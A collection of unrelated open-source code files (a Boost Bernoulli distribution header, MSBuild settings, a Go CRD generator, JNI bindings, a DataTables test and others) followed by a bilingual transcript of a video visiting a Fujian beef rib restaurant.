#ifndef BOOST_MATH_SPECIAL_BERNOULLI_HPP
#define BOOST_MATH_SPECIAL_BERNOULLI_HPP
#include <boost/math/distributions/fwd.hpp>
#include <boost/math/tools/config.hpp>
#include <boost/math/distributions/complement.hpp> // complements
#include <boost/math/distributions/detail/common_error_handling.hpp> // error checks
#include <boost/math/special_functions/fpclassify.hpp> // isnan.
#include <utility>
namespace boost
{
namespace math
{
namespace bernoulli_detail
{
// Common error checking routines for bernoulli distribution functions:
template <class RealType, class Policy>
inline bool check_success_fraction(const char* function, const RealType& p, RealType* result, const Policy& /* pol */)
{
if(!(boost::math::isfinite)(p) || (p < 0) || (p > 1))
{
*result = policies::raise_domain_error<RealType>(
function,
"Success fraction argument is %1%, but must be >= 0 and <= 1 !", p, Policy());
return false;
}
return true;
}
template <class RealType, class Policy>
inline bool check_dist(const char* function, const RealType& p, RealType* result, const Policy& /* pol */, const mpl::true_&)
{
return check_success_fraction(function, p, result, Policy());
}
template <class RealType, class Policy>
inline bool check_dist(const char* , const RealType& , RealType* , const Policy& /* pol */, const mpl::false_&)
{
return true;
}
template <class RealType, class Policy>
inline bool check_dist(const char* function, const RealType& p, RealType* result, const Policy& /* pol */)
{
return check_dist(function, p, result, Policy(), typename policies::constructor_error_check<Policy>::type());
}
template <class RealType, class Policy>
inline bool check_dist_and_k(const char* function, const RealType& p, RealType k, RealType* result, const Policy& pol)
{
if(check_dist(function, p, result, Policy(), typename policies::method_error_check<Policy>::type()) == false)
{
return false;
}
if(!(boost::math::isfinite)(k) || !((k == 0) || (k == 1)))
{
*result = policies::raise_domain_error<RealType>(
function,
"Number of successes argument is %1%, but must be 0 or 1 !", k, pol);
return false;
}
return true;
}
template <class RealType, class Policy>
inline bool check_dist_and_prob(const char* function, RealType p, RealType prob, RealType* result, const Policy& /* pol */)
{
if((check_dist(function, p, result, Policy(), typename policies::method_error_check<Policy>::type()) && detail::check_probability(function, prob, result, Policy())) == false)
{
return false;
}
return true;
}
} // namespace bernoulli_detail
template <class RealType = double, class Policy = policies::policy<> >
class bernoulli_distribution
{
public:
typedef RealType value_type;
typedef Policy policy_type;
bernoulli_distribution(RealType p = 0.5) : m_p(p)
{ // Default probability = half suits 'fair' coin tossing
// where probability of heads == probability of tails.
RealType result; // of checks.
bernoulli_detail::check_dist(
"boost::math::bernoulli_distribution<%1%>::bernoulli_distribution",
m_p,
&result, Policy());
} // bernoulli_distribution constructor.
RealType success_fraction() const
{ // Probability.
return m_p;
}
private:
RealType m_p; // success_fraction
}; // template <class RealType> class bernoulli_distribution
typedef bernoulli_distribution<double> bernoulli;
template <class RealType, class Policy>
inline const std::pair<RealType, RealType> range(const bernoulli_distribution<RealType, Policy>& /* dist */)
{ // Range of permissible values for random variable k = {0, 1}.
using boost::math::tools::max_value;
return std::pair<RealType, RealType>(static_cast<RealType>(0), static_cast<RealType>(1));
}
template <class RealType, class Policy>
inline const std::pair<RealType, RealType> support(const bernoulli_distribution<RealType, Policy>& /* dist */)
{ // Range of supported values for random variable k = {0, 1}.
// This is range where cdf rises from 0 to 1, and outside it, the pdf is zero.
return std::pair<RealType, RealType>(static_cast<RealType>(0), static_cast<RealType>(1));
}
template <class RealType, class Policy>
inline RealType mean(const bernoulli_distribution<RealType, Policy>& dist)
{ // Mean of bernoulli distribution = p (n = 1).
return dist.success_fraction();
} // mean
// Rely on dereived_accessors quantile(half)
//template <class RealType>
//inline RealType median(const bernoulli_distribution<RealType, Policy>& dist)
//{ // Median of bernoulli distribution is not defined.
// return tools::domain_error<RealType>(BOOST_CURRENT_FUNCTION, "Median is not implemented, result is %1%!", std::numeric_limits<RealType>::quiet_NaN());
//} // median
template <class RealType, class Policy>
inline RealType variance(const bernoulli_distribution<RealType, Policy>& dist)
{ // Variance of bernoulli distribution =p * q.
return dist.success_fraction() * (1 - dist.success_fraction());
} // variance
template <class RealType, class Policy>
RealType pdf(const bernoulli_distribution<RealType, Policy>& dist, const RealType& k)
{ // Probability Density/Mass Function.
BOOST_FPU_EXCEPTION_GUARD
// Error check:
RealType result = 0; // of checks.
if(false == bernoulli_detail::check_dist_and_k(
"boost::math::pdf(bernoulli_distribution<%1%>, %1%)",
dist.success_fraction(), // 0 to 1
k, // 0 or 1
&result, Policy()))
{
return result;
}
// Assume k is integral.
if (k == 0)
{
return 1 - dist.success_fraction(); // 1 - p
}
else // k == 1
{
return dist.success_fraction(); // p
}
} // pdf
template <class RealType, class Policy>
inline RealType cdf(const bernoulli_distribution<RealType, Policy>& dist, const RealType& k)
{ // Cumulative Distribution Function Bernoulli.
RealType p = dist.success_fraction();
// Error check:
RealType result = 0;
if(false == bernoulli_detail::check_dist_and_k(
"boost::math::cdf(bernoulli_distribution<%1%>, %1%)",
p,
k,
&result, Policy()))
{
return result;
}
if (k == 0)
{
return 1 - p;
}
else
{ // k == 1
return 1;
}
} // bernoulli cdf
template <class RealType, class Policy>
inline RealType cdf(const complemented2_type<bernoulli_distribution<RealType, Policy>, RealType>& c)
{ // Complemented Cumulative Distribution Function bernoulli.
RealType const& k = c.param;
bernoulli_distribution<RealType, Policy> const& dist = c.dist;
RealType p = dist.success_fraction();
// Error checks:
RealType result = 0;
if(false == bernoulli_detail::check_dist_and_k(
"boost::math::cdf(bernoulli_distribution<%1%>, %1%)",
p,
k,
&result, Policy()))
{
return result;
}
if (k == 0)
{
return p;
}
else
{ // k == 1
return 0;
}
} // bernoulli cdf complement
template <class RealType, class Policy>
inline RealType quantile(const bernoulli_distribution<RealType, Policy>& dist, const RealType& p)
{ // Quantile or Percent Point Bernoulli function.
// Return the number of expected successes k either 0 or 1.
// for a given probability p.
RealType result = 0; // of error checks:
if(false == bernoulli_detail::check_dist_and_prob(
"boost::math::quantile(bernoulli_distribution<%1%>, %1%)",
dist.success_fraction(),
p,
&result, Policy()))
{
return result;
}
if (p <= (1 - dist.success_fraction()))
{ // p <= pdf(dist, 0) == cdf(dist, 0)
return 0;
}
else
{
return 1;
}
} // quantile
template <class RealType, class Policy>
inline RealType quantile(const complemented2_type<bernoulli_distribution<RealType, Policy>, RealType>& c)
{ // Quantile or Percent Point bernoulli function.
// Return the number of expected successes k for a given
// complement of the probability q.
//
// Error checks:
RealType q = c.param;
const bernoulli_distribution<RealType, Policy>& dist = c.dist;
RealType result = 0;
if(false == bernoulli_detail::check_dist_and_prob(
"boost::math::quantile(bernoulli_distribution<%1%>, %1%)",
dist.success_fraction(),
q,
&result, Policy()))
{
return result;
}
if (q <= 1 - dist.success_fraction())
{ // // q <= cdf(complement(dist, 0)) == pdf(dist, 0)
return 1;
}
else
{
return 0;
}
} // quantile complemented.
template <class RealType, class Policy>
inline RealType mode(const bernoulli_distribution<RealType, Policy>& dist)
{
return static_cast<RealType>((dist.success_fraction() <= 0.5) ? 0 : 1); // p = 0.5 can be 0 or 1
}
template <class RealType, class Policy>
inline RealType skewness(const bernoulli_distribution<RealType, Policy>& dist)
{
BOOST_MATH_STD_USING; // Aid ADL for sqrt.
RealType p = dist.success_fraction();
return (1 - 2 * p) / sqrt(p * (1 - p));
}
template <class RealType, class Policy>
inline RealType kurtosis_excess(const bernoulli_distribution<RealType, Policy>& dist)
{
RealType p = dist.success_fraction();
// Note Wolfram says this is kurtosis in text, but gamma2 is the kurtosis excess,
// and Wikipedia also says this is the kurtosis excess formula.
// return (6 * p * p - 6 * p + 1) / (p * (1 - p));
// But Wolfram kurtosis article gives this simpler formula for kurtosis excess:
return 1 / (1 - p) + 1/p -6;
}
template <class RealType, class Policy>
inline RealType kurtosis(const bernoulli_distribution<RealType, Policy>& dist)
{
RealType p = dist.success_fraction();
return 1 / (1 - p) + 1/p -6 + 3;
// Simpler than:
// return (6 * p * p - 6 * p + 1) / (p * (1 - p)) + 3;
}
} // namespace math
} // namespace boost
// This include must be at the end, *after* the accessors
// for this distribution have been defined, in order to
// keep compilers that support two-phase lookup happy.
#include <boost/math/distributions/detail/derived_accessors.hpp>
#endif // BOOST_MATH_SPECIAL_BERNOULLI_HPP
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8" ?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Import Project="..\..\src\vvvv45.props" />
<PropertyGroup>
<SolutionDir Condition="$(SolutionDir) == '' Or $(SolutionDir) == '*Undefined*'">.\</SolutionDir>
<RestorePackages>true</RestorePackages>
</PropertyGroup>
<!-- Override vvvvv45.props -->
<!-- Build -->
<PropertyGroup>
<AddonCoreDir>$(MSBuildThisFileDirectory)..\lib\core\</AddonCoreDir>
<AddonPluginsDir>$(MSBuildThisFileDirectory)..\lib\nodes\plugins\</AddonPluginsDir>
</PropertyGroup>
<!-- Deploy -->
<PropertyGroup>
<DeployPrefix>addons</DeployPrefix>
<DeployDir>$(DeployBaseDir)addonpack\</DeployDir>
<DeployInclude>..\**\*.*</DeployInclude>
<DeployExclude>..\**\.gitignore;..\**\*.pdb;..\src\**\*.*;..\tests\**\*.*;..\lib\nodes\plugins\*\bin\**\*.*</DeployExclude>
<!-- Files to exclude for platform specific builds -->
<DeployExclude Condition=" '$(Platform)' == 'x86' ">$(DeployExclude)</DeployExclude>
<DeployExclude Condition=" '$(Platform)' == 'x64' ">$(DeployExclude);..\lib\nodes\freeframes\*.*</DeployExclude>
<DeployReadOnlyFiles>lib\nodes\*.*</DeployReadOnlyFiles>
<DeploySignFiles>false</DeploySignFiles>
</PropertyGroup>
</Project>
| {
"pile_set_name": "Github"
} |
//
// Contacts.swift
// Telephone
//
// Copyright © 2008-2016 Alexey Kuznetsov
// Copyright © 2016-2020 64 Characters
//
// Telephone is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
//
// Telephone is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
public protocol Contacts {
func enumerate(_ body: @escaping (Contact) -> Void)
}
| {
"pile_set_name": "Github"
} |
//
// MIT License
//
// Copyright (c) 2014 Bob McCune http://bobmccune.com/
// Copyright (c) 2014 TapHarmonic, LLC http://tapharmonic.com/
//
// Permission is hereby granted, free of charge, to any person obtaining a copy
// of this software and associated documentation files (the "Software"), to deal
// in the Software without restriction, including without limitation the rights
// to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
// copies of the Software, and to permit persons to whom the Software is
// furnished to do so, subject to the following conditions:
//
// The above copyright notice and this permission notice shall be included in
// all copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
// IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
// FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
// AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
// LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
// OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
// THE SOFTWARE.
//
#import "THThumbnail.h"
@implementation THThumbnail
+ (instancetype)thumbnailWithImage:(UIImage *)image time:(CMTime)time {
return [[self alloc] initWithImage:image time:time];
}
- (id)initWithImage:(UIImage *)image time:(CMTime)time {
self = [super init];
if (self) {
_image = image;
_time = time;
}
return self;
}
@end
| {
"pile_set_name": "Github"
} |
#include "stdio.h"
#include "string.h"
#define maxn 20203
#define F(x) ((x)/3+((x)%3==1?0:tb))
#define G(x) ((x)<tb?(x)*3+1:((x)-tb)*3+2)
int wa[maxn],wb[maxn],wv[maxn],ws[maxn];
int c0(int *r,int a,int b)
{return r[a]==r[b]&&r[a+1]==r[b+1]&&r[a+2]==r[b+2];}
int c12(int k,int *r,int a,int b)
{if(k==2) return r[a]<r[b]||r[a]==r[b]&&c12(1,r,a+1,b+1);
else return r[a]<r[b]||r[a]==r[b]&&wv[a+1]<wv[b+1];}
void sort(int *r,int *a,int *b,int n,int m)
{
int i;
for(i=0;i<n;i++) wv[i]=r[a[i]];
for(i=0;i<m;i++) ws[i]=0;
for(i=0;i<n;i++) ws[wv[i]]++;
for(i=1;i<m;i++) ws[i]+=ws[i-1];
for(i=n-1;i>=0;i--) b[--ws[wv[i]]]=a[i];
return;
}
void dc3(int *r,int *sa,int n,int m)
{
int i,j,*rn=r+n,*san=sa+n,ta=0,tb=(n+1)/3,tbc=0,p;
r[n]=r[n+1]=0;
for(i=0;i<n;i++) if(i%3!=0) wa[tbc++]=i;
sort(r+2,wa,wb,tbc,m);
sort(r+1,wb,wa,tbc,m);
sort(r,wa,wb,tbc,m);
for(p=1,rn[F(wb[0])]=0,i=1;i<tbc;i++)
rn[F(wb[i])]=c0(r,wb[i-1],wb[i])?p-1:p++;
if(p<tbc) dc3(rn,san,tbc,p);
else for(i=0;i<tbc;i++) san[rn[i]]=i;
for(i=0;i<tbc;i++) if(san[i]<tb) wb[ta++]=san[i]*3;
if(n%3==1) wb[ta++]=n-1;
sort(r,wb,wa,ta,m);
for(i=0;i<tbc;i++) wv[wb[i]=G(san[i])]=i;
for(i=0,j=0,p=0;i<ta && j<tbc;p++)
sa[p]=c12(wb[j]%3,r,wa[i],wb[j])?wa[i++]:wb[j++];
for(;i<ta;p++) sa[p]=wa[i++];
for(;j<tbc;p++) sa[p]=wb[j++];
return;
}
int rank[maxn],height[maxn];
void calheight(int *r,int *sa,int n)
{
int i,j,k=0;
for(i=1;i<=n;i++) rank[sa[i]]=i;
for(i=0;i<n;height[rank[i++]]=k)
for(k?k--:0,j=sa[rank[i]-1];r[i+k]==r[j+k];k++);
return;
}
int r[maxn*3],sa[maxn*3];
int who[maxn],yes[101]={0},ii=0;
int len,n;
int check(int mid)
{
int i,j,k,t,s;
for(i=2;i<=len;i=j+1)
{
for(;height[i]<mid && i<=len;i++);
for(j=i;height[j]>=mid;j++);
if(j-i+1<n) continue;
ii++;s=0;
for(k=i-1;k<j;k++)
if((t=who[sa[k]])!=0)
if(yes[t]!=ii) yes[t]=ii,s++;
if(s>=n) return 1;
}
return 0;
}
char st[110];
int main()
{
int i,j,k,min,mid,max,nn;
scanf("%d",&nn);
while(nn-->0)
{
scanf("%d",&n);
len=0;
for(i=1;i<=n;i++)
{
scanf("%s",st);
k=strlen(st);
for(j=0;j<k;j++)
{
r[j+len]=st[j]+200;
who[j+len]=i;
}
r[len+k]=2*i-1;
who[len+k]=0;
len+=k+1;
for(j=0;j<k;j++)
{
r[j+len]=st[k-1-j]+200;
who[j+len]=i;
}
r[len+k]=2*i;
who[len+k]=0;
len+=k+1;
}
len--;
r[len]=0;
dc3(r,sa,len+1,328);
calheight(r,sa,len);
height[len+1]=-1;
min=1;max=100;
while(min<=max)
{
mid=(min+max)>>1;
if(check(mid)) min=mid+1;
else max=mid-1;
}
if(n==1) max=len/2;
printf("%d\n",max);
}
return 0;
}
| {
"pile_set_name": "Github"
} |
/*
Copyright 2018 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package generator
import (
"fmt"
"log"
"os"
"path"
"strings"
"github.com/ghodss/yaml"
"github.com/spf13/afero"
extensionsv1beta1 "k8s.io/apiextensions-apiserver/pkg/apis/apiextensions/v1beta1"
"k8s.io/gengo/args"
"k8s.io/gengo/types"
crdutil "sigs.k8s.io/controller-tools/pkg/crd/util"
"sigs.k8s.io/controller-tools/pkg/internal/codegen"
"sigs.k8s.io/controller-tools/pkg/internal/codegen/parse"
"sigs.k8s.io/controller-tools/pkg/util"
)
// Generator generates CRD manifests from API resource definitions defined in Go source files.
type Generator struct {
RootPath string
OutputDir string
Domain string
Namespace string
SkipMapValidation bool
// OutFs is filesystem to be used for writing out the result
OutFs afero.Fs
// apisPkg is the absolute Go pkg name for current project's 'pkg/apis' pkg.
// This is needed to determine if a Type belongs to the project or it is a referred Type.
apisPkg string
}
// ValidateAndInitFields validate and init generator fields.
func (c *Generator) ValidateAndInitFields() error {
var err error
if c.OutFs == nil {
c.OutFs = afero.NewOsFs()
}
if len(c.RootPath) == 0 {
// Take current path as root path if not specified.
c.RootPath, err = os.Getwd()
if err != nil {
return err
}
}
// Validate root path is under go src path
if !crdutil.IsUnderGoSrcPath(c.RootPath) {
return fmt.Errorf("command must be run from path under $GOPATH/src/<package>")
}
// If Domain is not explicitly specified,
// try to search for PROJECT file as a basis.
if len(c.Domain) == 0 {
if !crdutil.PathHasProjectFile(c.RootPath) {
return fmt.Errorf("PROJECT file missing in dir %s", c.RootPath)
}
c.Domain = crdutil.GetDomainFromProject(c.RootPath)
}
// Validate apis directory exists under working path
apisPath := path.Join(c.RootPath, "pkg/apis")
if _, err := os.Stat(apisPath); err != nil {
return fmt.Errorf("error validating apis path %s: %v", apisPath, err)
}
c.apisPkg, err = crdutil.DirToGoPkg(apisPath)
if err != nil {
return err
}
// Init output directory
if c.OutputDir == "" {
c.OutputDir = path.Join(c.RootPath, "config/crds")
}
return nil
}
// Do manages CRD generation.
func (c *Generator) Do() error {
arguments := args.Default()
b, err := arguments.NewBuilder()
if err != nil {
return fmt.Errorf("failed making a parser: %v", err)
}
// Switch working directory to root path.
if err := os.Chdir(c.RootPath); err != nil {
return fmt.Errorf("failed switching working dir: %v", err)
}
if err := b.AddDirRecursive("./pkg/apis"); err != nil {
return fmt.Errorf("failed making a parser: %v", err)
}
ctx, err := parse.NewContext(b)
if err != nil {
return fmt.Errorf("failed making a context: %v", err)
}
arguments.CustomArgs = &parse.Options{SkipMapValidation: c.SkipMapValidation}
// TODO: find an elegant way to fulfill the domain in APIs.
p := parse.NewAPIs(ctx, arguments, c.Domain, c.apisPkg)
crds := c.getCrds(p)
return c.writeCRDs(crds)
}
func (c *Generator) writeCRDs(crds map[string][]byte) error {
// Ensure output dir exists.
if err := c.OutFs.MkdirAll(c.OutputDir, os.FileMode(0700)); err != nil {
return err
}
for file, crd := range crds {
outFile := path.Join(c.OutputDir, file)
if err := (&util.FileWriter{Fs: c.OutFs}).WriteFile(outFile, crd); err != nil {
return err
}
}
return nil
}
func getCRDFileName(resource *codegen.APIResource) string {
elems := []string{resource.Group, resource.Version, strings.ToLower(resource.Kind)}
return strings.Join(elems, "_") + ".yaml"
}
func (c *Generator) getCrds(p *parse.APIs) map[string][]byte {
crds := map[string]extensionsv1beta1.CustomResourceDefinition{}
for _, g := range p.APIs.Groups {
for _, v := range g.Versions {
for _, r := range v.Resources {
crd := r.CRD
// ignore types which do not belong to this project
if !c.belongsToAPIsPkg(r.Type) {
continue
}
if len(c.Namespace) > 0 {
crd.Namespace = c.Namespace
}
fileName := getCRDFileName(r)
crds[fileName] = crd
}
}
}
result := map[string][]byte{}
for file, crd := range crds {
b, err := yaml.Marshal(crd)
if err != nil {
log.Fatalf("Error: %v", err)
}
result[file] = b
}
return result
}
// belongsToAPIsPkg returns true if type t is defined under pkg/apis pkg of
// current project.
func (c *Generator) belongsToAPIsPkg(t *types.Type) bool {
return strings.HasPrefix(t.Name.Package, c.apisPkg)
}
| {
"pile_set_name": "Github"
} |
enum IsPathHandler(alias T) = is(PathHandler == typeof(T));
| {
"pile_set_name": "Github"
} |
/*
* Copyright (c) 2016, Oracle and/or its affiliates. All rights reserved.
* DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER.
*
* This code is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License version 2 only, as
* published by the Free Software Foundation. Oracle designates this
* particular file as subject to the "Classpath" exception as provided
* by Oracle in the LICENSE file that accompanied this code.
*
* This code is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
* version 2 for more details (a copy is included in the LICENSE file that
* accompanied this code).
*
* You should have received a copy of the GNU General Public License version
* 2 along with this work; if not, write to the Free Software Foundation,
* Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
*
* Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA
* or visit www.oracle.com if you need additional information or have any
* questions.
*/
#include "jvm.h"
#include "java_lang_ref_Reference.h"
JNIEXPORT jobject JNICALL
Java_java_lang_ref_Reference_getAndClearReferencePendingList(JNIEnv *env, jclass ignore)
{
return JVM_GetAndClearReferencePendingList(env);
}
JNIEXPORT jboolean JNICALL
Java_java_lang_ref_Reference_hasReferencePendingList(JNIEnv *env, jclass ignore)
{
return JVM_HasReferencePendingList(env);
}
JNIEXPORT void JNICALL
Java_java_lang_ref_Reference_waitForReferencePendingList(JNIEnv *env, jclass ignore)
{
JVM_WaitForReferencePendingList(env);
}
| {
"pile_set_name": "Github"
} |
package invokestatic.issue4;
public class AB extends codeforjar.A {
}
| {
"pile_set_name": "Github"
} |
// DATA_TEMPLATE: empty_table
oTest.fnStart( "bProcessing" );
/* It's actually a bit hard to set this one due to the fact that it will only be shown
* when DataTables is doing some kind of processing. The server-side processing is a bit
* better to test this than here - so we just the interal functions to enable it and check
* that it is available
*/
$(document).ready( function () {
/* Check the default */
var oTable = $('#example').dataTable( {
"sAjaxSource": "../../../examples/ajax/sources/arrays.txt",
"bDeferRender": true
} );
var oSettings = oTable.fnSettings();
oTest.fnWaitTest(
"Processing is off by default",
null,
function () { return oSettings.oFeatures.bProcessing == false; }
);
oTest.fnWaitTest(
"Processing div is not in the DOM",
function () { oTable.oApi._fnProcessingDisplay( oSettings, true ); },
function () { return document.getElementById('example_processing') == null; }
);
oTest.fnWaitTest(
"Processing div cannot be shown",
function () { oTable.oApi._fnProcessingDisplay( oSettings, true ); },
function () { return document.getElementById('example_processing') == null; }
);
oTest.fnWaitTest(
"Processing div cannot be hidden",
function () { oTable.oApi._fnProcessingDisplay( oSettings, false ); },
function () { return document.getElementById('example_processing') == null; }
);
/* Check can disable */
oTest.fnWaitTest(
"Processing can be enabled",
function () {
oSession.fnRestore();
oTable = $('#example').dataTable( {
"sAjaxSource": "../../../examples/ajax/sources/arrays.txt",
"bDeferRender": true,
"bProcessing": true
} );
oSettings = oTable.fnSettings();
},
function () { return oSettings.oFeatures.bProcessing == true; }
);
oTest.fnWaitTest(
"Processing div is in the DOM",
function () { oTable.oApi._fnProcessingDisplay( oSettings, true ); },
function () { return document.getElementById('example_processing'); }
);
oTest.fnWaitTest(
"Processing div is hidden by default",
function () { oTable.oApi._fnProcessingDisplay( oSettings, true ); },
function () { return document.getElementById('example_processing').style.visibility = "hidden"; }
);
oTest.fnWaitTest(
"Processing div can be shown",
function () { oTable.oApi._fnProcessingDisplay( oSettings, true ); },
function () { return document.getElementById('example_processing').style.visibility = "visible"; }
);
oTest.fnWaitTest(
"Processing div can be hidden",
function () { oTable.oApi._fnProcessingDisplay( oSettings, false ); },
function () { return document.getElementById('example_processing').style.visibility = "hidden"; }
);
/* Enable makes no difference */
oTest.fnWaitTest(
"Processing disabled override",
function () {
oSession.fnRestore();
oTable = $('#example').dataTable( {
"sAjaxSource": "../../../examples/ajax/sources/arrays.txt",
"bDeferRender": true,
"bProcessing": false
} );
oSettings = oTable.fnSettings();
},
function () { return oSettings.oFeatures.bProcessing == false; }
);
oTest.fnWaitTest(
"Processing div is not in the DOM",
function () { oTable.oApi._fnProcessingDisplay( oSettings, true ); },
function () { return document.getElementById('example_processing') == null; }
);
oTest.fnComplete();
} ); | {
"pile_set_name": "Github"
} |
package example.service;
import example.repo.Customer1287Repository;
import org.springframework.stereotype.Service;
@Service
public class Customer1287Service {
public Customer1287Service(Customer1287Repository repo) {
}
}
| {
"pile_set_name": "Github"
} |
///////////////////////////////////////////////////////////////////////////////
// Name: wx/osx/evtloop.h
// Purpose: simply forwards to wx/osx/carbon/evtloop.h or
// wx/osx/cocoa/evtloop.h for consistency with the other Mac
// headers
// Author: Vadim Zeitlin
// Modified by:
// Created: 2006-01-12
// Copyright: (c) 2006 Vadim Zeitlin <[email protected]>
// Licence: wxWindows licence
///////////////////////////////////////////////////////////////////////////////
#ifndef _WX_OSX_EVTLOOP_H_
#define _WX_OSX_EVTLOOP_H_
#ifdef __WXOSX_COCOA__
#include "wx/osx/cocoa/evtloop.h"
#else
#include "wx/osx/carbon/evtloop.h"
#endif
class WXDLLIMPEXP_FWD_CORE wxWindow;
class WXDLLIMPEXP_FWD_CORE wxNonOwnedWindow;
class WXDLLIMPEXP_CORE wxModalEventLoop : public wxGUIEventLoop
{
public:
wxModalEventLoop(wxWindow *modalWindow);
wxModalEventLoop(WXWindow modalNativeWindow);
#ifdef __WXOSX_COCOA__
// skip wxGUIEventLoop to avoid missing Enter/Exit notifications
virtual int Run() { return wxCFEventLoop::Run(); }
virtual bool ProcessIdle();
#endif
protected:
virtual void OSXDoRun();
virtual void OSXDoStop();
// (in case) the modal window for this event loop
wxNonOwnedWindow* m_modalWindow;
WXWindow m_modalNativeWindow;
};
#endif // _WX_OSX_EVTLOOP_H_
| {
"pile_set_name": "Github"
} |
https://www.youtube.com/watch?v=WPcUQqMEGss
标题:福建大叔炖牛排,15元一块肉,就肉汤能吃一碗饭!卖完200斤就关门
This Fujian uncle makes stewed beef ribs and beef soup! 100kg beef is sold everyday
描述:
福建百年老店,大叔一家6口人做牛排快餐,
15元一根牛肋排,咖喱味道的,
吃起来辛辣味十足,就着肉汤都能吃饱!
大叔家一天只卖200斤牛排,80斤牛肉羹,想吃的得早点来。
This is a 100-year-old restaurant in Fujian selling beef rib fast food, run by an uncle and his 6-member family.
With 15 yuan, you get a curry flavored beef rib.
With an intense spicy flavor, it's fills you up so well together with the beef soup!
The uncle sells only 100kg beef rib and 80kg beef soup everyday. If you want to have some, come early.
福建 泉州市(地名)
Quanzhou, Fujian
(炖牛排 肉粽)
(Beef rib stew & meat zongzi)
这就是牛排
These are braised beef ribs
这里还有酸菜 萝卜
And they also have pickles and radish
它这边也有套餐
They have combo as well
咸饭 牛排
Salty rice and beef rib
你好 我要这个牛排
Hello. I want this beef rib
两碗米饭
Two bowls of rice
再要一个牛肉羹
And a beef soup
要一个大碗还是小碗
Big bowl or small bowl?
小碗就可以
Small bowl
牛排就一小份 牛肉羹也是一小碗
One beef rib and one beef soup
那拿两个牛排吧
Two beef ribs then
牛排两个 那汤只要一碗
Two beef ribs and one bowl of soup
汤只要一碗
Only one bowl of soup
咸菜 青菜需要吗
Need pickles and vegetables?
不需要 谢谢
No thanks
46块钱
46 yuan
扫码(手机付款)后拿着单子去前面取菜
Scan the code to pay. Then take the receipt to get your order
我的钱付过去了
Paid
(牛肉羹)
Beef soup
(咸饭)
Salty rice
(给我的是咸饭?)
(Did I order salty rice?)
(牛排)
(Beef rib)
我看很多评论都会说
I read a lot of comments asking
为什么不给摄影师吃呢
why I never let the cameraman eat
这次就给摄影师傅吃
We let him eat this time
加了一块肉 加了一碗咸饭
We took extra meat and an extra bowl of salty rice
他们这边的米饭是11点半之后
They have plain rice
才有这种白米饭
Only after 11 am
11点半之前都是这种咸饭
They only have salty rice before 11:30 am
一看就是加了胡萝卜
Obviously, they added carrots in
有味道的咸饭
Seasoned salty rice
这次咱们主要是来吃牛排
We came here mainly for the beef rib
这个牛排是这种炖的牛排
This is stewed beef rib
15块钱一块儿
15 yuan for each
还有一碗 这个是10块钱的牛肉羹
And this beef soup is 10 yuan
再加了一个3块钱的咸饭
And we added 3 yuan salty rice
刚才点餐的时候
When we were ordering
点餐的小哥哥说
the cashier bro said that
这个牛排很小 确实是很小
the beef rib is small in size. It's indeed very small
只有这么一小碟的肉
Such a small dish of beef rib
牛排是带骨头的牛肋排
This is beef ribs with bones
和咱们平常说的西式的牛排是不一样的
Which is different from western style rib steak
它这个是炖出来的
They stewed the beef rib
它一看就是炖的特别烂
With long cook time until tender
(肉烂脱骨)
Meat is easy to take off bones
(直接撕着吃)
Just pull and eat
牛排其实颜色比较深
This beef rib is in dark color
下面汤汁里的油还是有很多的
And the sauce below contains a lot of oil
用它来配米饭 应该还不错
So it seems good to go with rice
吃起来有这种咖喱的味道
It has a curry flavor
还有这种黑胡椒粉 辛辣的味道
And the spicy flavor of pepper powder
牛肉其实瘦肉比较多
In fact it is mostly lean meat
但是有了汤汁之后
But not that dry
就会觉得牛排没有那么柴
With soup
(拿下来了吧)
(We've taken it off)
这是我喜欢的味道
That's the flavor I like
很滑啊 朝哪走啊
It's so slippery. Don't go
对比这几天吃的饭你会发现
Compared with food we had recently
这个牛排还属于比较重口的
This beef rib has a relatively intense taste
其他的饮食都是比较清淡的
While the others are relatively mild
我们主打的就是牛排 牛肉羹
Our specialty dish is beef rib and beef soup
其实也没有其他很多的小菜
Not that many side dishes
主要就是牛肉 牛排
Mainly it is beef and ribs
(我们专业就是做这个)
We are pro in it
(四代人)
Four generations
(四代人都是做这个)
Four generations doing this
刚才那个收银员是您儿子
Is that cashier your son?
他第四代 我第三代
He is the fourth generation. I’m the third
我看咱这边的牛排 其实
It seems to me that your beef rib here
和其他地方的牛排都不太一样
is different from those at other places
做法不一样
We have a different recipe
是
yeah
而且牛排是这种比较小的
This type of beef rib is smaller
我们基本上都是传统的做法
We cook it with the traditional way
嗯 对 牛肉羹都是手工的
Year our beef soup is hand made also
这边牛排是这种咖喱味的是吧
Is this beef rib with curry flavor
放一点咖喱
With a little curry
放一点那个
And with
(姜 葱)
Ginger and green onions
大叔 这个店一般是几点开始营业
Uncle, when is it open everyday?
